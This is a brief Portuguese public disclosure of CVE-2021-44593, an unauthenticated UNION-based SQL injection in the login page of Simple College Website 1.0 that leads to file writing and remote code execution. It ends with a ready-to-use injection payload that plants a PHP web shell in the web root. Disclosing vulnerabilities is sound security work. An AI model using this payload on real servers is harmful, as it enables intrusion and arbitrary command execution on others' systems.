
Divulgação pública e writeup do CVE-2021-44593, uma injeção SQL não autenticada no Simple College Website que leva a upload arbitrário de arquivos e execução remota de código.
Divulgação pública da CVE-2021-44593. Uma vulnerabilidade de injeção SQL/upload arbitrário de arquivos/execução remota de código no Simple College Website.
O Simple College Website 1.0 é vulnerável a uma injeção SQL baseada em UNION não autenticada no parâmetro "username" da página /admin/login.php, que pode então ser explorada para fazer upload de arquivos arbitrários e obter execução remota de código.
A função login() em admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -